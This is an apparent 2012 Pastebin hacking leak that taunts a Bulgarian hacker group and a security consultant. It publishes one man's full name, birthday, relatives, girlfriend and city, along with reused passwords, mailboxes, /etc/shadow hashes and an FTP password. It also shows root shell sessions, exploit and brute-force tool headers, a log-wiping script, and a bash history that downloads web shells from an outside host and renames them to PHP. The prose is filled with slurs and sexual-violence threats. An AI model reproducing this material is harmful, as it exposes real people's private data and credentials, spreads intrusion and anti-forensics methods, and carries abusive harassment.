SHARE
TWEET

Untitled

a guest Jul 18th, 2012 697 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.                 __________                __       _____   __________.__
  2.                 \______   \__  _  _______/  |_    /  |  |  \______   \  |__  __ __  ____
  3.                  |     ___/\ \/ \/ /    \   __\  /   |  |_  |     ___/  |  \|  |  \/    \
  4.                  |    |     \     /   |  \  |   /    ^   /  |    |   |   Y  \  |  /   |  \
  5.                  |____|      \/\_/|___|  /__|   \____   |   |____|   |___|  /____/|___|  /
  6.                                        \/            |__|                 \/           \/
  7.  
  8.  
  9.  
  10.  
  11.                                  LOL >            SlaserX               < LOL
  12.                                  LOL >          Pirate-Sky              < LOL
  13.                                  LOL >          SecurityGuy             < LOL
  14.  
  15.  
  16.  
  17.                                         * LOL * SlaserX * LOL *
  18.  
  19.  
  20. SlaserX is a well-known criminal and wannabe hacker from Bulgaria. He's been around for quite some time now. A few weeks ago the miserable idiot and his fellow minions got finally busted and the misguided cops mistakenly claimed to have arrested the most powerful hacker group in Bulgaria[1]. Wait, what?!
  21.  
  22. Cops, Y U so unbelievably stupid? You're nothing but miserable media whores. We've been fucking around with these kids and we certainly know how 1337 they are. We've got their passwords, we've been reading through their mail spools, we've been laughing at their hacking attempts and yet, you call them the most powerful hacker group. Yes, some of the most talented hackers worldwide are actually based in Eastern Europe, but you silly bitches won't ever hear about them. Suck on my hard cock and and die, brainless cunts! How the fuck can you even be so stupid and lame?
  23.  
  24. Take a seat, enjoy this leak and remember.. this is absolutely nothing compared to what we've done to you, idiots.
  25.  
  26. [1] http://press.mvr.bg/en/News/news120704_08.htm
  27.  
  28. >> So, who's this guy?
  29.  
  30. First Name:     Ivan
  31. Last Name:      Bachvarov
  32. Nickname:       SlaSerX
  33. Birthday:       21.07.1986
  34. Height:         1.76cm
  35. Father:         Jecho Bachvarov
  36. Sister:         Mariana Bachvarova
  37. Girlfriend:     Mihaela Mandalcheva
  38. Location:       Burgas, Bulgaria
  39.  
  40. >> Let's take a look at what his passwords look like.
  41.  
  42. vbox7.com (slaserx:1986125),
  43. hit.bg (slaserx:1986125),
  44. theunkn0wn.org (slaserx:1986125),
  45. kaldata.com (slaserx:1986125),
  46. bghelp.bg (slaserx:1986125),
  47. etc.
  48.  
  49. >> Yes, password reusage is so typical for these idiots. You still call yourself a hacker? Here are some of his already owned mail boxes.
  50.  
  51. slaserx@abv.bg
  52. froztfi2@abv.bg
  53. slaserx@dir.bg
  54. routeros@abv.bg
  55. slaserx@mbox.contact.bg
  56.  
  57. >> Guess how 1337 his passwords were? ;) Now let's take a look at some of his boxes.
  58.  
  59. root@bgdns:/root# uname -a
  60. Linux bgdns 2.6.32-5-686 #1 SMP Wed Jan 12 04:01:41 UTC 2011 i686 GNU/Linux
  61.  
  62.  
  63. root@bgdns:/root# w
  64.  23:15:45 up  6:26,  2 users,  load average: 0.08, 0.09, 0.09
  65. USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
  66. root     pts/0    office           16:51    6:23m  0.42s  0.42s -bash
  67. root     pts/1    office           17:37    5:17m  0.34s  0.34s -bash
  68.  
  69.  
  70. root@bgdns:/root# cat /etc/shadow
  71. root:$6$OeWqv5cY$zN9ZVm79q0KLjbsWI.HG0MMlUPiv6c2PrOtYwHJt1UFtcgXwhIgY63u0ZQuMXnWlUN4rKCDbf9Qb7jwC.Bdpp.:15024:0:99999:7:::
  72. daemon:*:15024:0:99999:7:::
  73. bin:*:15024:0:99999:7:::
  74. sys:*:15024:0:99999:7:::
  75. sync:*:15024:0:99999:7:::
  76. games:*:15024:0:99999:7:::
  77. man:*:15024:0:99999:7:::
  78. lp:*:15024:0:99999:7:::
  79. mail:*:15024:0:99999:7:::
  80. news:*:15024:0:99999:7:::
  81. uucp:*:15024:0:99999:7:::
  82. proxy:*:15024:0:99999:7:::
  83. www-data:*:15024:0:99999:7:::
  84. backup:*:15024:0:99999:7:::
  85. list:*:15024:0:99999:7:::
  86. irc:*:15024:0:99999:7:::
  87. gnats:*:15024:0:99999:7:::
  88. nobody:*:15024:0:99999:7:::
  89. libuuid:!:15024:0:99999:7:::
  90. Debian-exim:!:15024:0:99999:7:::
  91. statd:*:15024:0:99999:7:::
  92. sshd:*:15024:0:99999:7:::
  93. slaserx:$6$XW1z1pT4$h/y7KaZRtOjijhnQLV4nIeBwMggaX/WwPTCVEUasRnUwKMIs1NVA70/4EwE/wDQTsH/xgzYQeEgtaiP3NtEkx1:15031:0:99999:7:::
  94. postfix:*:15024:0:99999:7:::
  95. mysql:!:15024:0:99999:7:::
  96. bind:*:15024:0:99999:7:::
  97. polw:!:15024:0:99999:7:::
  98. postgrey:*:15024:0:99999:7:::
  99. proftpd:!:15024:0:99999:7:::
  100. ftp:*:15024:0:99999:7:::
  101. vmail:!:15024:0:99999:7:::
  102. vu2000:!:15024:0:99999:7:::
  103. vu2001:!:15024:0:99999:7:::
  104. vu2002:!:15024:0:99999:7:::
  105. vu2003:!:15024:0:99999:7:::
  106. snmp:*:15025:0:99999:7:::
  107. vu2004:!:15025:0:99999:7:::
  108. vu2005:!:15031:0:99999:7:::
  109. vu2006:!:15034:0:99999:7:::
  110. vu2007:!:15034:0:99999:7:::
  111. vu2008:!:15035:0:99999:7:::
  112. messagebus:*:15038:0:99999:7:::
  113. lbcd:*:15038:0:99999:7:::
  114. vu2009:!:15039:0:99999:7:::
  115.  
  116. >> Ever wondered what the most powerful hacker tools look like? Well, take look..
  117.  
  118. root@bgdns:/root# head -25 l33t/a.pl
  119. #!/usr/bin/perl
  120.  
  121. use IO::Socket;
  122.  
  123.  
  124. print q{
  125. #######################################################################
  126. #    vBulletin. Version 4.0.1 Remote SQL Injection Exploit            #
  127. #                      By indoushka                                   #
  128. #                     www.iq-ty.com/vb                                #
  129. #               Souk Naamane  (00213771818860)                        #
  130. #           Algeria Hackerz (indoushka@hotmail.com)                   #
  131. #          Dork: Powered by vBulletin. Version 4.0.1                  #
  132. #######################################################################
  133. };
  134.  
  135. if (!$ARGV[2]) {
  136.  
  137. print q{
  138.         Usage: perl  VB4.0.1.pl host /directory/ victim_userid
  139.  
  140.        perl  VB4.0.1.pl www.vb.com /forum/ 1
  141.  
  142.  
  143. };
  144.  
  145.  
  146. root@bgdns:/root# head -5 l33t/gen
  147. #!/usr/bin/perl
  148. ##
  149. ###  bren.pl . Generate every character combination for 15 characters in length(ughh.)
  150. ##
  151. #
  152.  
  153.  
  154. root@bgdns:/root# head -30 l33t/t.pl
  155. #!/usr/bin/perl
  156.  
  157. use IO::Socket;
  158. use LWP::Simple;
  159. use MIME::Base64;
  160.  
  161. $host     = $ARGV[0];
  162. $user     = $ARGV[1];
  163. $port     = $ARGV[2];
  164. $list     = $ARGV[3];
  165. $file     = $ARGV[4];
  166. $url = "http://".$host.":".$port;
  167. if(@ARGV < 3){
  168. print q(
  169. ###############################################################
  170. #               Cpanel Password Brute Force Tool              #
  171. ###############################################################
  172. #     usage : cpanel.pl [HOST] [User] [PORT][list] [File]    #
  173. #-------------------------------------------------------------#
  174. #    [Host] : victim Host             (simorgh-ev.com)        #
  175. #    [User] : User Name               (demo)                  #
  176. #    [PORT] : Port of Cpanel          (2082)                  #
  177. #[list] : File Of password list   (list.txt)              #
  178. #    [File] : file for save password  (password.txt)          #
  179. #                                                             #
  180. ###############################################################
  181. #            (c)oded By Hessam-x / simorgh-ev.com             #
  182. ###############################################################
  183. );exit;}
  184.  
  185.  
  186. root@bgdns:/root# tar tvf tools.tar
  187. drwxr-xr-x root/root         0 2011-02-11 11:14 tools/
  188. -rwxr-xr-x root/root       904 2011-01-15 18:18 tools/stop.flood
  189. -rwxr-xr-x root/root       700 2011-01-15 18:21 tools/monitor
  190. -rw-r--r-- slaserx/slaserx 1800 2011-02-11 11:11 tools/shells.zip
  191. -rwxr-xr-x root/root       1853 2011-02-07 18:30 tools/check.ssh
  192. drwxr-xr-x root/root          0 2011-01-16 19:45 tools/sms/
  193. -rwxr-xr-x root/root       1360 2011-01-16 19:26 tools/sms/212.70.159.86
  194. -rwxr-xr-x root/root       1332 2011-01-16 19:41 tools/sms/212.70.159.82-m
  195. -rwxr-xr-x root/root       1326 2011-01-16 19:42 tools/sms/212.70.159.86-m
  196. -rwxr-xr-x root/root       1271 2011-01-16 19:30 tools/sms/7.7.7.7
  197. -rwxr-xr-x root/root       1331 2011-01-16 19:43 tools/sms/212.70.159.87-m
  198. -rwxr-xr-x root/root        630 2011-01-19 09:47 tools/sms/run
  199. -rwxr-xr-x root/root       1333 2011-01-16 19:42 tools/sms/212.70.159.83-m
  200. -rwxr-xr-x root/root       1365 2011-01-16 19:27 tools/sms/212.70.159.87
  201. -rwxr-xr-x root/root       1367 2011-01-16 18:50 tools/sms/212.70.159.83
  202. -rwxr-xr-x root/root       1366 2011-01-16 18:49 tools/sms/212.70.159.82
  203. -rwxr-xr-x root/root       1332 2011-01-16 19:40 tools/sms/94.156.142.99-m
  204. -rwxr-xr-x root/root       1366 2011-01-16 18:45 tools/sms/94.156.142.99
  205. -rwxr-xr-x root/root        528 2011-01-15 18:20 tools/unban
  206. -rwxr-xr-x root/root        526 2011-01-15 18:19 tools/ban
  207. -rwxr-xr-x root/root        136 2011-01-15 18:36 tools/grep.404
  208. -rwxr-xr-x root/root        468 2011-01-15 18:35 tools/logged
  209. -rwxr-xr-x root/root        302 2011-01-15 18:22 tools/dellog
  210. -rw-r--r-- root/root         14 2011-02-07 18:30 tools/bannedips.txt
  211. drwxr-xr-x root/root          0 2011-02-11 14:38 tools/shells/
  212. -rwxr-xr-x root/root        143 2010-07-16 13:41 tools/shells/find.r57
  213. -rwxr-xr-x root/root         12 2010-07-16 13:45 tools/shells/a
  214. -rwxr-xr-x root/root        144 2010-07-16 13:56 tools/shells/find.eval
  215. -rwxr-xr-x root/root        178 2010-07-16 14:35 tools/shells/find.shell
  216. -rwxr-xr-x root/root        144 2010-07-16 13:45 tools/shells/find.rt13
  217. -rwxr-xr-x root/root        153 2010-07-16 13:49 tools/shells/find.decode
  218. -rwxr-xr-x root/root      34461 2011-02-11 14:40 tools/shells/scan.txt
  219. -rwxr-xr-x root/root        143 2010-06-30 14:57 tools/shells/find.c99
  220. drwxr-xr-x root/root          0 2011-02-04 20:46 tools/backup/
  221. -rwxr-xr-x root/root        641 2011-02-04 20:44 tools/backup/backup-rsbg
  222. -rwxr-xr-x root/root        657 2011-02-04 20:45 tools/backup/backup-slaserx
  223. -rwxr-xr-x root/root        271 2011-02-07 11:23 tools/backup/run
  224. -rwxr-xr-x root/root        650 2011-02-04 20:41 tools/backup/backup-psc
  225.  
  226.  
  227. root@bgdns:/root# tar tzvf t.tar.gz
  228. drwxr-xr-x root/root         0 2011-03-01 20:20 l33t/
  229. -rwxr-xr-x root/root      2358 2011-02-28 17:26 l33t/a.pl
  230. -rwxr-xr-x root/root    961923 2011-02-27 01:31 l33t/list.txt
  231. -rwxr-xr-x root/root     18883 2010-12-20 01:09 l33t/slowloris.pl
  232. -rwxr-xr-x root/root       156 2011-03-01 18:17 l33t/test.txt
  233. -rwxrwxrwx root/root        11 2011-02-28 17:26 l33t/a
  234. -rwx--x--x root/root     66502 2011-02-27 06:46 l33t/list.txt.save
  235. -rw-r--r-- root/root     20056 2011-03-01 20:21 l33t/ssh2ftpcrack.tar.bz2
  236. -rwxr-xr-x root/root      2109 2011-02-27 00:51 l33t/t.pl
  237. -rwxr-xr-x root/root      6359 2011-02-27 00:52 l33t/gen
  238.  
  239.  
  240. root@bgdns:/root# cat .bash_alias
  241. # some more ls aliases
  242. alias less='less -SR'
  243. alias l='ls -lLBhX --time-style=locale'
  244. alias la='ls -la $1 | less'
  245. alias ll='ls -lX'
  246. alias lx='ls -lXB' #sort by ext
  247. alias lk='ls -lSr' #soft by size
  248.  
  249. # Alias's to modifed commands
  250. alias ps='ps auxf'
  251. alias home='cd ~'
  252. alias pg='ps aux | grep' #requires an argument
  253. alias lg='ls -la | grep' #requires an argument
  254. alias un='tar -zxvf'
  255. alias df='df -hT'
  256. alias ping='ping -c 10'
  257. #alias net-restart='sudo /etc/init.d/networking restart'
  258. #alias windir="cd '/home/hkvn/.wine/drive_c/Program Files'"
  259. alias ..='cd ..'
  260. alias update='sudo apt-get update'
  261. alias upgrade='sudo apt-get upgrade'
  262. alias install='sudo apt-get install'
  263. alias remove='sudo apt-get remove'
  264. #alias eclipse='eclipse -vmargs -Xmx512M'
  265. #alias firefox='firefox-3.5'
  266. alias ipconfig='ifconfig -a'
  267.  
  268. #My alias
  269. alias flood='netstat'
  270. alias stop='/root/tools/stop.flood'
  271. alias ban='/root/tools/ban.pl'
  272. alias unban='/root/tools/unban.pl'
  273. alias monitor='/root/tools/monitor.sh'
  274. alias cron='env EDITOR=nano crontab -e'
  275. alias editcfg='pico /var/www/ispcp/gui/index.php'
  276. alias arest='/etc/init.d/apache2 restart'
  277. alias cls='clear'
  278. alias q='exit'
  279. # Some ssh connections
  280. alias shell='ssh -l slaserx slaserx.ath.cx'
  281. #alias xalo='sudo vpnc-connect xalo.conf'
  282.  
  283. # Some ping commands
  284. #alias pga='ping 192.168.1.1 -c 10'
  285. #alias pgo='ping google.com -c 10'
  286. #alias phk='ping hkvn.info -c 10'
  287. #alias pch='ping chuyenhungyen.org -c 10'
  288.  
  289. #Some chmod commands
  290. alias mx='chmod a+x'
  291. alias 000='chmod 000'
  292. alias 644='chmod 644'
  293. alias 755='chmod 755'
  294.  
  295.  
  296. # cat .bash_history
  297. clear
  298. nmap localhost
  299. exit
  300. host perfektno.com
  301. w
  302. iptables -L |grep 77.78.36.40
  303. ban 77.78.36.40
  304. pico /etc/init.d/firewall
  305. ls -a
  306. iptables -L
  307. clear
  308. search metaspolit
  309. search metasploit
  310. search icmp rate
  311. pico /etc/init.d/firewall
  312. iptables -L
  313. stop
  314. flood
  315. clear
  316. exit
  317. pico /etc/networks
  318. pico /etc/network/interfaces
  319. exit
  320. host cs-adrenalines.info
  321. host 79.124.67.194
  322. stop
  323. flood
  324. cat /var/log/fail2ban.log
  325. cat /var/log/psad/fw_check
  326. cat /var/log/psad/top_attackers
  327. clear
  328. clear
  329. stop
  330. exit
  331. cd l33t/
  332. wget https://cirt.net/nikto/nikto-2.1.4.tar.bz2
  333. ls -a
  334. wget
  335. wget --help
  336. wget --help |grep ssl
  337. wget --no-check-certificate https://cirt.net/nikto/nikto-2.1.4.tar.bz2
  338. tar -jxvf nikto-2.1.4.tar.bz2
  339. cd nikto-2.1.4/
  340. ls -a
  341. ./nikto.pl
  342. ./nikto.pl -host abv.bg -root
  343. ./nikto.pl -host abv.bg -root+
  344. ./nikto.pl -host abv.bg
  345. ./nikto.pl
  346. ./nikto.pl -host
  347. ./nikto.pl -host pweb.co.cc
  348. w
  349. last
  350. flood
  351. stop
  352. apachectl restart
  353. stop
  354. apachectl restart
  355. cd /root/tools/
  356. ./dellog
  357. cat /var/log/apache2/pirate-sky.info-combined.log
  358. cat /var/log/apache2/pirate-sky.info-combined.log
  359. cat /var/log/apache2/pirate-sky.info-combined.log
  360. iptables -L
  361. host eco.gov.kz
  362. cat /var/log/apache2/pirate-sky.info-combined.log
  363. apachectl restart
  364. apachectl restart
  365. ls -a
  366. cron
  367. cron
  368. /etc/init.d/cron restart
  369. cd /var/www/virtual/warez-database.org/htdocs/
  370. ls -a
  371. cd hooks/
  372. ls -a
  373. cd ..
  374. ls -a
  375. cd converge_local/
  376. ls -a
  377. ls -a
  378. ls -a
  379. wget xpls.hit.bg/shell/shell.gif
  380. rm -rf shell.gif
  381. wget xpls.hit.bg/shell/linuxbg.shell
  382. wget xpls.hit.bg/shell/linuxbg.gif
  383. rm -rf linuxbg.*
  384. ls -a
  385. ls -a
  386. mv /home/slaserx/faq.php ./
  387. ls -a
  388. rm -rf .htaccess
  389. ls -a
  390. rm -rf faq.php
  391. /
  392. cd /
  393. pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
  394. pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
  395. clear
  396. whois privatecrew.net
  397. whois privatecrew.net
  398. whois bgdns.info
  399. host freebsd.bg
  400. clear
  401. genpasswd
  402. clear
  403. genpasswd
  404. genpasswd
  405. genpasswd
  406. ls -a
  407. cd /var/www/virtual/privatecrew.net/htdocs/
  408. ls -s
  409. ls -a
  410. rm -rf *
  411. ls -a
  412. ls -a
  413. cd ..
  414. cp ../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
  415. ls -a
  416. cat ../pirate-sky.info/htdocs/conf_global.php
  417. ls -a
  418. cp pirate-sky.info-backup-2011.03.06-000737.tar.bz2 backups/
  419. clear
  420. ls -a
  421. rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  422. rm -rf backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  423. genpasswd
  424. genpasswd
  425. genpasswd
  426. ls -a
  427. cd htdocs/
  428. ls -a
  429. pico /etc/init.d/firewall
  430. cat /etc/init.d/firewall
  431. iptables -t filter -A INPUT -s 95.42.32.36 -j ACCEPT
  432. pico /etc/init.d/firewall
  433. /etc/init.d/firewall
  434. flood
  435. stop
  436. ls -a
  437. iptables -L |grep 94.156.142.66
  438. iptables -L |grep lucifer
  439. stop
  440. iptables -L |grep 95.42.32.36
  441. iptables -L
  442. cd /var/www/fcgi/
  443. ls -a
  444. pico warez-database.org/php5/php.ini
  445. pico privatecrew.net/php5/php.ini
  446. pico privatecrew.net/php5/php.ini
  447. apachectl restart
  448. pico privatecrew.net/php5/php.ini
  449. apachectl restart
  450. ls -a
  451. pico pirate-sky.com/php5/php.ini
  452. pico privatecrew.net/php5/php.ini
  453. apachectl restart
  454. cd /root/tools/
  455. ls -a
  456. cd shells/
  457. pico new.p
  458. pico new
  459. ls -a
  460. ./a
  461. ls -a
  462. pico find.r57
  463. pico new
  464. ./find.
  465. ./new
  466. ls -a
  467. ls -a
  468. cd /var/www/virtual/
  469. ls -a
  470. cd privatecrew.net/htdocs/
  471. cd /root/tools/
  472. cd shells/
  473. ./new
  474. ls -a
  475. pico new
  476. pico find.eval
  477. ls -a
  478. pico new
  479. pico new
  480. ./new
  481. ls -a
  482. pico new
  483. ls -a
  484. ./new
  485. ls -a
  486. pico new
  487. ls -a
  488. ./new
  489. pico new
  490. ./new
  491. ls -a
  492. rm -rf new
  493. pico find.shell
  494. cat scan.txt
  495. pico scan.txt
  496. rm -rf scan.txt
  497. ls -a
  498. ./find.shell
  499. ls -a
  500. cat scan.txt
  501. ls -a
  502. rm -rf scan.txt
  503. cat sc
  504. ls -a
  505. pico find.shell
  506. pico find.shell
  507. ./find.shell
  508. cat scan.txt
  509. rm -rf scan.txt
  510. ls -a
  511. ./find.shell
  512. cat scan.txt
  513. cat scan.txt |grep faq.php
  514. ls -a
  515. rm -rf scan.txt
  516. pico /var/www/virtual/privatecrew.net/htdocs/faq.php
  517. pico find.shell
  518. ls -a
  519. ./find.
  520. ./find.shell
  521. cat scan.txt
  522. ls -a
  523. clear
  524. cd /var/www/virtual/
  525. ls -a
  526. cd privatecrew.net/
  527. ls -a
  528. cd htdocs/
  529. cd 0893552070/
  530. ls -a
  531. wget http://xpls.hit.bg/shell/c99.gif
  532. wget http://xpls.hit.bg/shell/devil.gif
  533. wget http://xpls.hit.bg/shell/linux.gif
  534. ls -a
  535. mv linux.gif linux.php
  536. ls -a
  537. mv devil.gif devil.php
  538. mv c99.gif c99.php
  539. ls -a
  540. wget http://xpls.hit.bg/shell/shell.gif
  541. mv shell.gif shell.php
  542. ls -a
  543. ls -a
  544. ls -a
  545. ls -a
  546. ls -a
  547. ls -a
  548. ls -a
  549. cp linux.php /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/
  550. rm -rf /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/linux.php
  551. ls -a
  552. ls -a
  553. ls -a
  554. clear
  555. ls -a
  556. cd ..
  557. rm -rf 0893552070/
  558. ls -a
  559. exit
  560. ls -a
  561. ls -a
  562. cd /var/www/virtual/pirate-sky.
  563. cd /var/www/virtual/privatecrew.net/htdocs/
  564. ls -a
  565. cd a
  566. ls -a
  567. cd asd/
  568. ls -a
  569. ls -a
  570. ls -a
  571. ls -a
  572. ls -a
  573. ls -a
  574. ls -a
  575. ls -a
  576. ls -a
  577. ls -a
  578. ls -a
  579. ls -a
  580. ls -a
  581. ls -a
  582. ls -a
  583. ls -a
  584. ls -a
  585. rm crontab -l
  586. crontab -l
  587. ls -a
  588. ls -a
  589. ls -a
  590. ls -a
  591. ls -a
  592. ls -a
  593. ls -a
  594. cd ..
  595. ls -a
  596. ls -a
  597. rm -rf admin/
  598. rm -rf cache/
  599. rm -rf con*
  600. ls -a
  601. rm -rf includes/
  602. ls -a
  603. ls -a
  604. rm -rf interface/
  605. rm -rf ips_kernel/
  606. ls -a
  607. rm -rf public/
  608. rm -rf starforum/
  609. ls -a
  610. rm -rf uploads/
  611. ls -a
  612. ls -a
  613. ls -a
  614. cd ..
  615. cd htdocs/
  616. cd ..
  617. cd backups/
  618. ls -a
  619. cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  620. cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
  621. ls -a
  622. pico /etc/crontab
  623. ls -a
  624. cd ..
  625. ls -a
  626. cd htdocs/
  627. ls -a
  628. cd ..
  629. cd backups/
  630. rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  631. cd ..
  632. cd htdocs/
  633. cd pp/
  634. ls -a
  635. ls -a
  636. ls -a
  637. ls -a
  638. ls -a
  639. ls -a
  640. host mikrotik-bg.net
  641. host 195.191.149.89
  642. cat /var/log/cron.log
  643. ls -a
  644. crontab -l
  645. cron
  646. /etc/init.d/cron restart
  647. /etc/init.d/cron status
  648. ls -a
  649. ls -a
  650. cat /var/log/cron.log
  651. cat /var/log/cron.log |grep err
  652. clear
  653. ls -a
  654. ls -a
  655. ls -a
  656. ls -a
  657. ls -a
  658. ls -a
  659. ls -a
  660. ls -a
  661. ls -a
  662. ls -a
  663. ls -a
  664. ls -a
  665. cat /var/log/cron.log
  666. ls -a
  667. ls -a
  668. crontab -l
  669. ls -a
  670. ls -a
  671. cat /var/log/cron.log
  672. ls -a
  673. ls -a
  674. ls -a
  675. ls -a
  676. ls -a
  677. ls -a
  678. ls -a
  679. ls -a
  680. ls -a
  681. ls -a
  682. ls -a
  683. ls
  684. ls
  685. ls -a
  686. ls -a
  687. ls -a
  688. ls -a
  689. ls -a
  690. ls -la
  691. ls -a
  692. ls -a
  693. ls -a
  694. ls -a
  695. ls -a
  696. cat /var/log/cron.log
  697. ls -a
  698. ls -a
  699. ls -a
  700. ls -a
  701. ls -a
  702. ls -a
  703. wget xpls.hit.bg/shell.gif
  704. wget xpls.hit.bg/linux.gif
  705. mv linux.gif linux.php
  706. mv shell.gif shell.php
  707. ls -a
  708. ls -a
  709. ls -a
  710. ls -a
  711. ls -a
  712. ls -a
  713. ls -a
  714. ls -a
  715. rm -rf /tmp/scan.txt
  716. ls -a
  717. ls -a
  718. ls -la
  719. ls -a
  720. ls -a
  721. ls -a
  722. pico linux.php
  723. ls -a
  724. rm -rf linux.php
  725. rm -rf shell.php
  726. ls -a
  727. ls -a
  728. wget xpls.hit.bg/shell/shell.gif
  729. wget xpls.hit.bg/shell/linux.gif
  730. mv linux.gif linux.php
  731. mv shell.gif shell.php
  732. pico shell.php
  733. ls -a
  734. pico shell.php
  735. ls -a
  736. wget xpls.hit.bg/shell/shell.gif
  737. mv linux.gif linux.php
  738. wget xpls.hit.bg/shell/linux.gif
  739. ls -a
  740. mv linux.gif linux.php
  741. mv shell.gif shell.php
  742. ls -a
  743. ls -a
  744. ls -a
  745. ls -a
  746. ls -a
  747. cat /tmp/scan.txt
  748. ls -a
  749. ls -a
  750. ls -a
  751. ls -a
  752. cat /var/log/cron.log
  753. ls -a
  754. ls -a
  755. ls -a
  756. ls -a
  757. ls -a
  758. ls -a
  759. ls -a
  760. ls -a
  761. ls -a
  762. cd ..
  763. cd ..
  764. cd ..
  765. cd ..
  766. exit
  767. cd /var/www/virtual/
  768. ls -a
  769. cd linuxbg.info/
  770. cd backups/
  771. ls -a
  772. rm -rf t3es_vb.sql.bz2
  773. ls -a
  774. rm -rf t3es_soze.sql.bz2
  775. ls -a
  776. whois cms-bg.com
  777. whois jump.bg
  778. stop
  779. cat /tmp/scan.txt
  780. cat /var/log/apache2/other_vhosts_access.log
  781. cat /var/log/apache2/default-error.log
  782. clear
  783. cat /var/log/apache2/default-error.log
  784. clear
  785. cat /var/log/apache2/default-error.log
  786. cat /var/log/apache2/default-error.log
  787. cat /var/log/apache2/default-error.log
  788. clear
  789. clear
  790. clear
  791. exit
  792. os -a
  793. pico /etc/init.d/firewall
  794. ping abv.bg
  795. ls -a
  796. exit
  797.  
  798.  
  799. root@bgdns:/root/tools/backup# cat backup-psc
  800. #!/bin/sh
  801. #Created by SlaSerX
  802. #red='1;31m'
  803. TARGET_EMAIL="359887538110@sms.mtel.net"
  804.  
  805. # local directory to pickup *.tar.gz file
  806.  
  807. tar zcvf /backup/psc/pirate-sky.$(date +%s).$(date +"%d-%m-%Y").tgz /var/www/virtual/pirate-sky.com/backups/
  808.  
  809. # ftp remote connections
  810.  
  811. FTPU="backup" # ftp login name
  812. FTPP="1986125" # ftp password
  813. FTPS="85.217.204.199" # remote ftp server
  814. FTPF="/home/backup/psc/" # remote ftp server directory for $FTPU & $FTPP
  815. LOCALD="/backup/psc/*.tgz"
  816. ncftpput -m -u $FTPU -p $FTPP $FTPS  $FTPF $LOCALD
  817.  
  818. echo
  819. echo -e "            \e[${red}   Upload psc Backup \e[m"
  820. echo 'pirate-sky' | mail -s "Backup Uploaded:" $TARGET_EMAIL
  821. echo
  822.  
  823. root@bgdns:/root/tools# head -10 check.ssh
  824. #!/usr/bin/perl
  825. ##############################################################################
  826. # By BumbleBeeWare.com 2006
  827. # SSH Log Checker
  828. # sshlogcheck.cgi
  829. # reads ssh log and blocks hacking attempts using ip tables
  830. ##############################################################################
  831. # CONFIGURE
  832. ##############################################################################
  833.  
  834.  
  835. root@bgdns:/root/tools# cat dellog
  836. #!/bin/bash
  837. #Created by SlaSerX
  838. red='1;31m'
  839. /bin/rm -rf /var/log/apache2/*.log
  840. /bin/rm -rf /var/log/apache2/*.log.*
  841. /bin/rm -rf /var/log/apache2/users/*.log
  842. /bin/rm -rf /var/log/apache2/users/*.log.*
  843. /etc/init.d/apache2 restart
  844. echo -e " \e[${red} Apache logs Erase. Apache has been restarted\e[m"
  845.  
  846.  
  847. root@bgdns:/root/tools# cat grep.404
  848. grep "404" /var/log/apache2/users/pirate-sky.com-access.log | grep "`date +%d/%b/%Y`" | mailx -s 'SUBJECT GOES HERE' 'routeros@abv.bg'
  849.  
  850. >> Refer to the URL at the end of the file for some more fun.
  851.  
  852.  
  853.  
  854.                                         * LOL * Pirate-Sky * LOL *
  855.  
  856. Lamez.org, Pirate-Sky, World Warez Crew, CyberWarrior Invasion Group, etc. are all the same bitches and idiots again and again. They've been continuously renaming their own groups due to all kind of spectacular fails during the years. These are basically brainless infants playing with SQLmap and defacing outdated and improperly configured CMSs.
  857.  
  858. You can clearly see how randomly they choose their targets -
  859. http://www.zone-h.org/archive/notifier=Cyber%20Warrior%20Invasion
  860.  
  861. >> Check the aforementioned URL for their databases. ;)
  862.  
  863.  
  864.  
  865.                                         * LOL * SecurityGuy * LOL *
  866.  
  867. Alexander Sverdlov a.k.a. the SecurityGuy is one of those pseudo-security whores that you'd like to publicly rape. This information security illiterate has been making money through consultancy and training services for ages. Giving your money to this miserable monkey will eventually boost your false sense of security, but nothing more or less. Beware of who you're entrusting your security decisions. Really.
  868.  
  869. >> Let's just briefly review what's this bitch up to.
  870.  
  871. nopasara@oss.bg [/home/nopasara/public_html/securityguy]# uname -a
  872. Linux hera.superhosting.bg 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:52:25 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
  873.  
  874.  
  875. nopasara@oss.bg [/home/nopasara/public_html/securityguy]# id
  876. uid=32684(nopasara) gid=32686(nopasara) groups=32686(nopasara)
  877.  
  878.  
  879. nopasara@oss.bg [/home/nopasara]# ls -lia
  880. total 28108
  881. 35897345 drwx--x--x  18 nopasara nopasara     4096 Mar 12 14:04 ./
  882.        2 drwx--x--x 660 root     root        20480 Mar 19 16:50 ../
  883. 35897557 -rw-------   1 nopasara nopasara     3048 Jan 18  2010 .bash_history
  884. 35897347 -rw-r--r--   1 nopasara nopasara       33 Dec 10  2008 .bash_logout
  885. 35897346 -rw-r--r--   1 nopasara nopasara      176 Dec 10  2008 .bash_profile
  886. 35897348 -rw-r--r--   1 nopasara nopasara      124 Dec 10  2008 .bashrc
  887. 35897357 -rw-------   1 nopasara nopasara       17 Dec 10  2008 .contactemail
  888. 35897376 drwx------   5 nopasara nopasara     4096 Mar  4 11:07 .cpanel/
  889. 35897878 -rw-------   1 nopasara nopasara       15 Dec 31  2008 .cpanel-logs
  890. 35897520 -rw-r--r--   1 nopasara nopasara        6 Mar 20 02:45 .dns
  891. 35897450 drwxr-x---   7 nopasara nopasara     4096 Feb 25  2010 .fantasticodata/
  892. 35897436 -rw-------   1 nopasara nopasara       17 Feb 18 01:53 .ftpquota
  893. 35897353 drwxr-x---   3 nopasara nobody       4096 Jan  4  2009 .htpasswds/
  894. 35897354 -rw-------   1 nopasara nopasara       12 Mar  4 10:44 .lastlogin
  895. 35897419 drwx------   2 nopasara nopasara     4096 Dec 19  2008 .trash/
  896. 35898508 -rw-------   1 nopasara nopasara     1808 Jan 18  2010 .viminfo
